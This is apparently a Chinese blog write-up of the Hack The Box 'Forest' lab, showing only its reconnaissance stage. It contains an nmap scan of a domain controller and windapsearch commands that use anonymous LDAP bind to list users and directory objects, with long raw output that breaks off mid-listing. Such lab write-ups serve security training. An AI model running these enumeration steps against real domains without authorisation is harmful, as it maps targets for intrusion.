HTB打靶(Active Directory 101 Forest)
2024-05-12 23:07:32
信息收集
使用nmap扫描发现域控服务器(10.10.10.161)
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-23 14:32:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1296/tcp filtered dproxy
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Aggressive OS guesses: Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Server 2012 (92%), Microsoft Windows Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 Update 1 (92%), Microsoft Windows Server 2016 build 10586 - 14393 (92%), Microsoft Windows Server 2012 or Server 2012 R2 (91%), Microsoft Windows 10 1507 - 1607 (90%), Microsoft Windows Server 2016 (90%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
尝试使用kali下的windapsearch检查ldap匿名绑定
windapsearch安装
https://github.com/Mephostophiles/windapsearch
pip install python-ldap #or apt-get install python-ldap
如果安装python-ldap报错apt-get updateapt-get install libsasl2-dev python3-dev libldap2-dev libssl-dev
命令:python windapsearch.py -d hb.local --dc-ip 10.10.10.161 -U
-U枚举用户,发现ldap可以匿名绑定并且枚举用户
扫描结果:
python windapsearch.py -d hb.local --dc-ip 10.10.10.161 -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.161
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None[+] Enumerating all AD users
[+] Found 28 users:cn: Guestcn: DefaultAccountcn: Exchange Online-ApplicationAccount
userPrincipalName: Exchange_Online-ApplicationAccount@htb.localcn: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}
userPrincipalName: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.localcn: SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}
userPrincipalName: SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.localcn: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}
userPrincipalName: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.localcn: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}
userPrincipalName: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}@htb.localcn: Migration.8f3e7716-2011-43e4-96b1-aba62d229136
userPrincipalName: Migration.8f3e7716-2011-43e4-96b1-aba62d229136@htb.localcn: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042
userPrincipalName: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@htb.localcn: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}
userPrincipalName: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.localcn: SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}
userPrincipalName: SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@htb.localcn: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}
userPrincipalName: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@htb.localcn: HealthMailboxc3d7722415ad41a5b19e3e00e165edbe
userPrincipalName: HealthMailboxc3d7722415ad41a5b19e3e00e165edbe@htb.localcn: HealthMailboxfc9daad117b84fe08b081886bd8a5a50
userPrincipalName: HealthMailboxfc9daad117b84fe08b081886bd8a5a50@htb.localcn: HealthMailboxc0a90c97d4994429b15003d6a518f3f5
userPrincipalName: HealthMailboxc0a90c97d4994429b15003d6a518f3f5@htb.localcn: HealthMailbox670628ec4dd64321acfdf6e67db3a2d8
userPrincipalName: HealthMailbox670628ec4dd64321acfdf6e67db3a2d8@htb.localcn: HealthMailbox968e74dd3edb414cb4018376e7dd95ba
userPrincipalName: HealthMailbox968e74dd3edb414cb4018376e7dd95ba@htb.localcn: HealthMailbox6ded67848a234577a1756e072081d01f
userPrincipalName: HealthMailbox6ded67848a234577a1756e072081d01f@htb.localcn: HealthMailbox83d6781be36b4bbf8893b03c2ee379ab
userPrincipalName: HealthMailbox83d6781be36b4bbf8893b03c2ee379ab@htb.localcn: HealthMailboxfd87238e536e49e08738480d300e3772
userPrincipalName: HealthMailboxfd87238e536e49e08738480d300e3772@htb.localcn: HealthMailboxb01ac647a64648d2a5fa21df27058a24
userPrincipalName: HealthMailboxb01ac647a64648d2a5fa21df27058a24@htb.localcn: HealthMailbox7108a4e350f84b32a7a90d8e718f78cf
userPrincipalName: HealthMailbox7108a4e350f84b32a7a90d8e718f78cf@htb.localcn: HealthMailbox0659cc188f4c4f9f978f6c2142c4181e
userPrincipalName: HealthMailbox0659cc188f4c4f9f978f6c2142c4181e@htb.localcn: Sebastien Caron
userPrincipalName: sebastien@htb.localcn: Lucinda Berger
userPrincipalName: lucinda@htb.localcn: Andy Hislip
userPrincipalName: andy@htb.localcn: Mark Brandt
userPrincipalName: mark@htb.localcn: Santi Rodriguez
userPrincipalName: santi@htb.local
使用windapsearch查询objectClass=*筛选其他对象
命令:python windapsearch.py -d hb.local --dc-ip 10.10.10.161 --custom "objectClass=*"
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.161
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Performing custom lookup with filter: "objectClass=*"
[+] Found 312 results:DC=htb,DC=localCN=Users,DC=htb,DC=localCN=Allowed RODC Password Replication Group,CN=Users,DC=htb,DC=localCN=Denied RODC Password Replication Group,CN=Users,DC=htb,DC=localCN=Read-only Domain Controllers,CN=Users,DC=htb,DC=localCN=Enterprise Read-only Domain Controllers,CN=Users,DC=htb,DC=localCN=Cloneable Domain Controllers,CN=Users,DC=htb,DC=localCN=Protected Users,CN=Users,DC=htb,DC=localCN=Key Admins,CN=Users,DC=htb,DC=localCN=Enterprise Key Admins,CN=Users,DC=htb,DC=localCN=DnsAdmins,CN=Users,DC=htb,DC=localCN=DnsUpdateProxy,CN=Users,DC=htb,DC=localCN=Exchange Online-ApplicationAccount,CN=Users,DC=htb,DC=localCN=SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1},CN=Users,DC=htb,DC=localCN=SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c},CN=Users,DC=htb,DC=localCN=SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9},CN=Users,DC=htb,DC=localCN=DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852},CN=Users,DC=htb,DC=localCN=Migration.8f3e7716-2011-43e4-96b1-aba62d229136,CN=Users,DC=htb,DC=localCN=FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042,CN=Users,DC=htb,DC=localCN=SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201},CN=Users,DC=htb,DC=localCN=SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA},CN=Users,DC=htb,DC=localCN=SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9},CN=Users,DC=htb,DC=localCN=Administrator,CN=Users,DC=htb,DC=localCN=Guest,CN=Users,DC=htb,DC=localCN=DefaultAccount,CN=Users,DC=htb,DC=localCN=krbtgt,CN=Users,DC=htb,DC=localCN=Domain Computers,CN=Users,DC=htb,DC=localCN=Domain Controllers,CN=Users,DC=htb,DC=localCN=Schema Admins,CN=Users,DC=htb,DC=localCN=Enterprise Admins,CN=Users,DC=htb,DC=localCN=Cert Publishers,CN=Users,DC=htb,DC=localCN=Domain Admins,CN=Users,DC=htb,DC=localCN=Domain Users,CN=Users,DC=htb,DC=localCN=Domain Guests,CN=Users,DC=htb,DC=localCN=Group Policy Creator Owners,CN=Users,DC=htb,DC=localCN=RAS and IAS Servers,CN=Users,DC=htb,DC=localCN=Computers,DC=htb,DC=localCN=EXCH01,CN=Computers,DC=htb,DC=localOU=Domain Controllers,DC=htb,DC=localCN=FOREST,OU=Domain Controllers,DC=htb,DC=localCN=RID Set,CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
CN=DFSR-LocalSettings,CN=FOREST,OU=Domain Controllers,DC=htb,DC=localCN=Domain System Volume,CN=DFSR-LocalSettings,CN=FOREST,OU=Domain Controllers,DC=htb,DC=localCN=SYSVOL Subscription,CN=Domain System Volume,CN=DFSR-LocalSettings,CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
CN=System,DC=htb,DC=localCN=WinsockServices,CN=System,DC=htb,DC=localCN=RpcServices,CN=System,DC=htb,DC=localCN=FileLinks,CN=System,DC=htb,DC=localCN=VolumeTable,CN=FileLinks,CN=System,DC=htb,DC=localCN=ObjectMoveTable,CN=FileLinks,CN=System,DC=htb,DC=localCN=Default Domain Policy,CN=System,DC=htb,DC=localCN=AppCategories,CN=Default Domain Policy,CN=System,DC=htb,DC=localCN=RID Manager$,CN=System,DC=htb,DC=localCN=Meetings,CN=System,DC=htb,DC=localCN=Policies,CN=System,DC=htb,DC=localCN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=htb,DC=localCN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=htb,DC=localCN=MicrosoftDNS,CN=System,DC=htb,DC=localDC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=localDC=@,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=localDC=A.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=localDC=B.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=localDC=C.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=localDC=D.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=localDC=E.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=localDC=F.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=localDC=G.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=localDC=H.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=localDC=I.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=localDC=J.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=localDC=K.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=localDC=L.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=localDC=M.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=localCN=RAS and IAS Servers Access Check,CN=System,DC=htb,DC=localCN=File Replication Service,CN=System,DC=htb,DC=localCN=Dfs-Configuration,CN=System,DC=htb,DC=localCN=IP Security,CN=System,DC=htb,DC=localCN=ipsecPolicy{72385230-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecISAKMPPolicy{72385231-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecNFA{72385232-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecNFA{59319BE2-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecNFA{594272E2-071D-11D3-AD22-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecNegotiationPolicy{72385233-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecFilter{7238523A-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecNegotiationPolicy{59319BDF-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecNegotiationPolicy{7238523B-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecFilter{72385235-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecPolicy{72385236-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecISAKMPPolicy{72385237-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecNFA{59319C04-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecNegotiationPolicy{59319C01-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecPolicy{7238523C-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecISAKMPPolicy{7238523D-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecNFA{7238523E-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecNFA{59319BF3-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecNFA{594272FD-071D-11D3-AD22-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecNegotiationPolicy{7238523F-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecNegotiationPolicy{59319BF0-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=localCN=ipsecNFA{6A1F5C6F-72B7-11D2-ACF0-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=localCN=DFSR-GlobalSettings,CN=System,DC=htb,DC=localCN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=htb,DC=localCN=Content,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=htb,DC=localCN=SYSVOL Share,CN=Content,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=htb,DC=localCN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=htb,DC=localCN=FOREST,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=htb,DC=localCN=AdminSDHolder,CN=System,DC=htb,DC=localCN=ComPartitions,CN=System,DC=htb,DC=localCN=ComPartitionSets,CN=System,DC=htb,DC=localCN=WMIPolicy,CN=System,DC=htb,DC=localCN=DomainUpdates,CN=System,DC=htb,DC=localCN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6E157EDF-4E72-4052-A82A-EC3F91021A22,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=ab402345-d3c3-455d-9ff7-40268a1099b6,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=bab5f54d-06c8-48de-9b87-d78b796564e4,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=f3dd09dd-25e8-4f9c-85df-12d6d2f2f2f5,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=2416c60a-fe15-4d7a-a61e-dffd5df864d3,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=7868d4c8-ac41-4e05-b401-776280e8e9f1,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=860c36ed-5241-4c62-a18b-cf6ff9994173,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=0e660ea3-8a5e-4495-9ad7-ca1bd4638f9e,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=a86fe12a-0f62-4e2a-b271-d27f601f8182,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=d85c0bfd-094f-4cad-a2b5-82ac9268475d,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6ada9ff7-c9df-45c1-908e-9fef2fab008a,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=10b3ad2a-6883-4fa7-90fc-6377cbdc1b26,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=98de1d3e-6611-443b-8b4e-f4337f1ded0b,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=f607fd87-80cf-45e2-890b-6cf97ec0e284,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=9cac1f66-2167-47ad-a472-2a13251310e4,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6ff880d6-11e7-4ed1-a20f-aac45da48650,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=446f24ea-cfd5-4c52-8346-96e170bcb912,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=51cba88b-99cf-4e16-bef2-c427b38d0767,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=a3dac986-80e7-4e59-a059-54cb1ab43cb9,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=293f0798-ea5c-4455-9f5d-45f33a30703b,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=5c82b233-75fc-41b3-ac71-c69592e6bf15,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=7ffef925-405b-440a-8d58-35e8cd6e98c3,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=4dfbb973-8a62-4310-a90c-776e00f83222,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=8437C3D8-7689-4200-BF38-79E4AC33DFA0,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=7cfb016c-4f87-4406-8166-bd9df943947f,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=f7ed4553-d82b-49ef-a839-2f38a36bb069,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=8ca38317-13a4-4bd4-806f-ebed6acb5d0c,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=3c784009-1f57-4e2a-9b04-6915c9e71961,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd5678-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd5679-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd567a-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd567b-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd567c-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd567d-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd567e-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd567f-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd5680-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd5681-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd5682-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd5683-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd5684-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd5685-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd5686-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd5687-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd5688-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd5689-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd568a-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd568b-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd568c-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=6bcd568d-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=3051c66f-b332-4a73-9a20-2d6a7d6e6a1c,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=3e4f4182-ac5d-4378-b760-0eab2de593e2,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=c4f17608-e611-11d6-9793-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=13d15cf0-e6c8-11d6-9793-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=8ddf6913-1c7b-4c59-a5af-b9ca3b3d2c4c,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=dda1d01d-4bd7-4c49-a184-46f9241b560e,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=a1789bfb-e0a2-4739-8cc0-e77d892d080a,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=61b34cb0-55ee-4be9-b595-97810b92b017,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=57428d75-bef7-43e1-938b-2e749f5a8d56,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=ebad865a-d649-416f-9922-456b53bbb5b8,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=0b7fb422-3609-4587-8c2e-94b10f67d1bf,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=2951353e-d102-4ea5-906c-54247eeec741,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=71482d49-8870-4cb3-a438-b6fc9ec35d70,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=aed72870-bf16-4788-8ac7-22299c8207f1,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=f58300d1-b71a-4DB6-88a1-a8b9538beaca,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=231fb90b-c92a-40c9-9379-bacfc313a3e3,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=4aaabc3a-c416-4b9c-a6bb-4b453ab1c1f0,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=9738c400-7795-4d6e-b19d-c16cd6486166,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=de10d491-909f-4fb0-9abb-4b7865c0fe80,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=b96ed344-545a-4172-aa0c-68118202f125,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=4c93ad42-178a-4275-8600-16811d28f3aa,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=c88227bc-fcca-4b58-8d8a-cd3d64528a02,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=5e1574f6-55df-493e-a671-aaeffca6a100,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=d262aae8-41f7-48ed-9f35-56bbb677573d,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=82112ba0-7e4c-4a44-89d9-d46c9612bf91,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=c3c927a6-cc1d-47c0-966b-be8f9b63d991,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=54afcfb9-637a-4251-9f47-4d50e7021211,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=f4728883-84dd-483c-9897-274f2ebcf11e,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=ff4f9d27-7157-4cb0-80a9-5d6f2b14c8ff,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=83C53DA7-427E-47A4-A07A-A324598B88F7,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=C81FC9CC-0130-4FD1-B272-634D74818133,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=E5F9E791-D96D-4FC9-93C9-D53E1DC439BA,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=e6d5fd00-385d-4e65-b02d-9da3493ed850,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=3a6b3fbf-3168-4312-a10d-dd5b3393952d,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=7F950403-0AB3-47F9-9730-5D7B0269F9BD,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=434bb40d-dbc9-4fe7-81d4-d57229f7b080,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=Windows2003Update,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=ActiveDirectoryUpdate,CN=DomainUpdates,CN=System,DC=htb,DC=localCN=BCKUPKEY_bcb64993-1db6-45d5-9b0d-b8186e8ee6a4 Secret,CN=System,DC=htb,DC=localCN=BCKUPKEY_P Secret,CN=System,DC=htb,DC=localCN=BCKUPKEY_b5b09264-b153-45ba-9501-e0f2b84c57a7 Secret,CN=System,DC=htb,DC=localCN=BCKUPKEY_PREFERRED Secret,CN=System,DC=htb,DC=localCN=Password Settings Container,CN=System,DC=htb,DC=localCN=PSPs,CN=System,DC=htb,DC=localCN=Server,CN=System,DC=htb,DC=localCN=LostAndFound,DC=htb,DC=localCN=Infrastructure,DC=htb,DC=localCN=ForeignSecurityPrincipals,DC=htb,DC=localCN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=htb,DC=localCN=S-1-5-7,CN=ForeignSecurityPrincipals,DC=htb,DC=localCN=S-1-1-0,CN=ForeignSecurityPrincipals,DC=htb,DC=localCN=S-1-5-4,CN=ForeignSecurityPrincipals,DC=htb,DC=localCN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=htb,DC=localCN=S-1-5-17,CN=ForeignSecurityPrincipals,DC=htb,DC=localCN=Microsoft Exchange System Objects,DC=htb,DC=localCN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=localCN=HealthMailboxc3d7722415ad41a5b19e3e00e165edbe,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=localCN=ExchangeActiveSyncDevices,CN=HealthMailboxc3d7722415ad41a5b19e3e00e165edbe,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=localCN=EASProbeDeviceType§EASProbeDeviceId141,CN=ExchangeActiveSyncDevices,CN=HealthMailboxc3d7722415ad41a5b19e3e00e165edbe,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=localCN=HealthMailboxfc9daad117b84fe08b081886bd8a5a50,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=localCN=ExchangeActiveSyncDevices,CN=HealthMailboxfc9daad117b84fe08b081886bd8a5a50,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=localCN=EASProbeDeviceType§EASProbeDeviceId141,CN=ExchangeActiveSyncDevices,CN=HealthMailboxfc9daad117b84fe08b081886bd8a5a50,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=localCN=HealthMailboxc0a90c97d4994429b15003d6a518f3f5,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=localCN=HealthMailbox670628ec4dd64321acfdf6e67db3a2d8,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=localCN=HealthMailbox968e74dd3edb414cb4018376e7dd95ba,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=localCN=HealthMailbox6ded67848a234577a1756e072081d01f,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=localCN=HealthMailbox83d6781be36b4bbf8893b03c2ee379ab,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=localCN=HealthMailboxfd87238e536e49e08738480d300e3772,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=localCN=HealthMailboxb01ac647a64648d2a5fa21df27058a24,CN=Monitoring Mailboxes,CN=Microsoft Exchange System 